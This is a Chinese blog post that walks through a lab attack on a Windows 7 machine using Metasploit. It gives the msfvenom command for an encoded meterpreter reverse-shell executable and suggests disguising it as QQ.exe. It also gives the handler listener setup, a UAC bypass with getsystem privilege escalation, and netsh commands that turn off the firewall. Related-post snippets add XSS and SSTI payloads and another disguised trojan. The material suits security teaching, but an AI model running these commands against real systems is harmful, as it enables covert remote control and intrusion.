攻下windows7第三天——构造payload

最新推荐文章于 2024-03-06 10:00:59 发布
置顶 最新推荐文章于 2024-03-06 10:00:59 发布
阅读量2.6k 收藏 13
点赞数 2
分类专栏: 渗透 文章标签: 信息安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/ploto_cs/article/details/108907743
版权

一.实验背景

随着windows系统的不断更新完善,windows对用户系统的安全力度也在加强。第一天和第二天的漏洞也很容易通过添加补丁修复,这对我们的渗透,也带来了不少的麻烦。所以今天我将带大家,利用目前流行的 metasploit 框架,绕过一些 UAC 及防火墙的限制,从而达到成功利用的目的!

二.实验环境

攻击机kali :192.168.126.129
靶机 win7:192.168.126.134

三.操作步骤

1.使用.exe作为web shell(关闭防火墙)
(1)生成一个payload
命令:msfvenom -p windows/meterpreter/reverse_tcp lhost=192.168.126.129 lport=4444 -f exe -o /root/virus.exe -e x86/shikata_ga_nai -i 8
在这里插入图片描述
(2)将程序上传到win7
可以适当伪装该程序(例如QQ.exe)
可以适当伪装该程序(例如QQ.exe)
(3)在kali中配置一个会话反弹程序
命令:

use exploit/multi/handler
set payload windows/meterpreter/reverse_tcp
set LHOST 192.168.126.129
set LPORT 4444
exploit

在这里插入图片描述
(4)当win7点击该软件后,就会执行meterpreter模块
在这里插入图片描述
(5)执行meterpreter模块的命令
例如:
在这里插入图片描述

2.使用.exe作为web shell(开启防火墙)
设置步骤如上同
(1)利用 getuid 和 getsystem 命令来提权
在这里插入图片描述
可以发现命令遭到了 UAC 的用户访问控制的拦截
(2)使用msfconsole其他模块绕过
命令:

use exploit/windows/local/ask
options
set session 1
exploit

在这里插入图片描述
此时win7会弹出一个窗口,点击确定即可
在这里插入图片描述
重新输入getsystem命令,此时不会报错
在这里插入图片描述
成功绕过防火墙

(3)重新进入会话(ASK模块)
相关操作:

exploit      //立刻发起进攻
exploit -l   //发起进攻存入后台
background   //将session放入后台
sessions     //查看当前session
sessions -i xx   //调用后台

在这里插入图片描述

现在我们通过shell来关闭防火墙
命令:

shell
netsh adcfirewall set allprofiles state off

shell(cmd界面)其他相关操作:
netsh advfirewall show allprofiles     //查看当前防火墙状态
netsh advfirewall set allprofiles state off   //关闭防火墙
netsh advfirewall set allprofiles state on   //开启防火墙

在这里插入图片描述
(出现乱码的原因:linux与windows编码格式不同。可以使用命令chcp 65001修复)
在win7中查看防火墙状态
在这里插入图片描述

可以看到防火墙已经关上,并已获得最高权限

网络信息安全-ploto

ploto_cs
关注
  • 2
    点赞
  • 13
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
xss payload构造方法
weixin_48734687的博客
10-01 2322
对照教程闯了几关总结一下各种绕过方式 url传参注入 未对参数进行任何过滤的 payload: <script>alert()</script> <img src=1 onerror=alert()> payload被引号包裹的 例如:<input name=keyword value="<script>alert()</script>">
Windows提权,网络安全编程基础
最新发布
m0_60607895的博客
04-08 914
msset payload windows/meterpreter/reverse_tcp # 设置payload,不同的木马设置不同的payload,设置payload时,要根据目标系统的系统位数设置相应的payload;set lhost 192.168.x.x # 我们的kali本机ipset lport 6666 # 我们的kali本机端口exploit使用msfvenom模块生成反弹木马:伪装成cmd.exemsfconsole # 在命令行里面输入命令,进入msf漏洞利用框架;
手动构造格式化字符串payload
weixin_66751120的博客
02-19 799
像上次总结的格式化字符串漏洞的题都是能够溢出大量字节,因此能够使用pwntools的工具来自动生成payload但是如果题目给到了字节限制,使payload链所占字节非常有限,不足以装下自动生成的,那么就需要我们去手动构造payload,在正式了解手动构造之前可以通过上面链接回顾一下格式化字符串漏洞的知识,并且需要特别注意三个格式化字符。这是手动构造的关键。这里要注意一个h是以两个字节的方式写入,一般使用这个可以更省字节。
SSTI的payload构造思路
shawdow_bug的博客
04-24 1999
内置的方法和属性 有些对象类型内置了一些可读属性,它们不会被dir()列举出来。 属性/方法 描述 instance._class_ 类实例所属的类 class._bases_ 类对象(类也是对象)的基类元组 definition._name_ 类、函数、方法、描述符或生成器实例的名称。 class._mro_ 此属性是在方法解析期间查找基类时考虑的类元组。 class._subclasses_() 每个类都保留一个对其直接子类的弱引用列表。此方法返回所有仍然存活的引用的列表
生成payload
分享学习网络的点点滴滴
12-30 607
【代码】生成payload
【XSS】payload 常用构造和变形方法
吉吉的博客
03-06 1587
XSS 相关 payload 构造和变形的常用方法。
sql盲注----构造payload 让信息通过错误提示回显出来
weixin_42350229的博客
01-15 920
基于报错的sql盲注----构造payload 让信息通过错误提示回显出来 select 1, count(*), concat(0x3a,0x3a,(select user()),0x3a,0x3a,floot(rand(0)*2))a jfrom information_schema.columns group by a; //explain:此处有三个点,一是需要 concat 计数,二是...
车载诊断协议DoIP系列 —— DoIP Payload Type详解.docx
03-10
车载诊断协议DoIP系列 —— DoIP Payload Type详解
FANUC_Payload_Checker_V7_48b.xlsm
08-28
FANUC 负载 计算
LGG7第三方刷机包-浩劫3.9
01-16
【LGG7第三方刷机包-浩劫3.9】是一个专为LG G7 ThinQ设计的第三方定制系统,旨在为用户带来全新的Android体验。"浩劫(Havoc)"是这个自定义ROM的名称,版本号为3.9,表明它是经过一系列改进和更新后的较新版本。该...
第七十三课:基于白名单Regasm.exe执行payload第三季1
08-03
具体参考微软官方文档:基于白名单Regasm.exe配置payload:配置击机msf:靶机执行:附录:Micropoor.cs注:x86 payloadpu
payload-dumper-解包
03-22
在IT行业中,"payload-dumper-解包"这个主题涉及到的是对特定文件格式的解析,尤其是针对payload.bin文件。Payload.bin通常是一种二进制文件,它可能包含各种系统数据、固件更新或者其他形式的执行代码,用于在目标...
栈溢出利用之return to dl-resolve payload 构造原理(二)
M021的专栏
11-03 2077
return to dl-resolve payload构造原理
强大的XSS Payload
Killua
03-23 8889
1.构造post方式的html表单背景:某博客存在存储型xss漏洞操作:通过使用js脚本构造一个XSS Payload自动创建文章。实验的价值在于,只要成功了意味着可以模拟GET POST请求操作用户的浏览器。这在cookie劫持失败以后比较有用,如当受害者点击了恶意链接后,自己加载黑客的脚本,脚本模拟GET或者POST操作,这样就可以查看受害者的邮箱等待。实际上是模拟浏览器发送一个post给服务...
网络安全 payload、shellcode、exp、poc
qq_45906009的博客
06-18 5605
在学习网络安全时,我们总会遇见几个名词:payload ,poc,exp,shellcode,有些小伙伴可能会分不清,这些有什么区别,那么下面我就来讲讲。 什么是PoC(Proof of Concept概念证明) Poc是用来证明漏洞存在的。简单来说用来证明一段漏洞的代码,他是无害的。 EXP EXP全称(exploit)即利用,是指利用系统漏洞进行击的动作,例如我前面那篇对于MS17010的漏洞利用中,我真正的运行是exploit进行运行的,当然也可以用run。 Payloda payload
ctf pwn 题目
m0_64195960的博客
04-11 1341
2022年3月21栈迁移 这道题是栈迁移 1)先checksec一下 嗯哼哼,貌似影响不大 2)丢在ida里瞅 1、main() 没啥用再看看其它的 2、vul() 第一个read读进去的东西,可以被printf呸!吐出来! 芜湖!看到了第二个read可以栈溢出,但是可以溢出的空间太少! ————————那么就要来到了,刚学习的栈迁移—————————— 3、hack() 芜湖看到system函数了,那我们就可以获得system的返回地址从而调用.
windows7第四天——死亡蓝屏(MS012-020)漏洞
ploto_cs的博客
10-17 6183
一.漏洞介绍 MS12-020全称Microsoft Windows远程桌面协议RDP远程代码执行漏洞 远程桌面协议是一个多通道的协议,让用户连上提供微软终端机服务的电脑。Windows在处理某些对象时存在错误,可通过特制的RDP报文访问未初始化的或已经删除的对象,导致任意代码执行,然后控制系统。 二.实验环境 击机kali 192.168.126.129 靶机 win7 192.168.126.134 三.漏洞利用条件 开启3389端口 未安装ms012-020补丁 未开启防火墙 击机和目标机在同一
windows7第二天——永恒之蓝(MS017-010)漏洞
ploto_cs的博客
10-02 4503
windows7第二天——永恒之蓝(MS017-010)漏洞 一、永恒之蓝介绍 永恒之蓝是在Windows的SMB服务处理SMB v1请求时发生的漏洞,这个漏洞导致击者在目标系统上可以执行任意代码。通过永恒之蓝漏洞会扫描开放445文件共享端口的Windows机器,无需用户任何操作,只要开机上网,不法分子就能在电脑和服务器中植入勒索软件、远程控制木马、虚拟货币挖矿机等恶意程序。 二、metasploit工具介绍 metasploit 是一个开源框架,这个框架用来做渗透测试,其 msf 是由多个不同的模块
怎么构造payload
09-08
构造payload,可以使用以下方法: 1. 要获取基类object的所有子类,可以使用以下payload:''.__class__.__base__.__subclasses__()。这将返回一个列表,其中包含所有子类的引用。 2. 要构造一个能执行函数的payload,可以使用以下步骤: a. 首先,定义一个函数,可以是你想要执行的任何功能,比如执行系统命令或读取文件。 b. 使用函数的名称和参数,构造一个可执行的字符串。 c. 将可执行字符串作为参数传递给eval()函数,以执行该函数。 例如,如果你想执行系统命令,可以使用以下payloadpayload = '''import os os.system("command")''' 这个payload会导入os模块,并使用os.system()函数执行你想要的命令。 请注意,构造payload时要小心安全问题,并确保只执行受信任的操作。此外,使用不当的payload可能会导致意外的行为或系统损坏,请谨慎操作。<span class="em">1</span><span class="em">2</span><span class="em">3</span> #### 引用[.reference_title] - *1* *2* *3* [SSTI的payload构造思路](https://blog.csdn.net/shawdow_bug/article/details/116109433)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v93^chatsearchT3_1"}}] [.reference_item style="max-width: 100%"] [ .reference_list ]

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值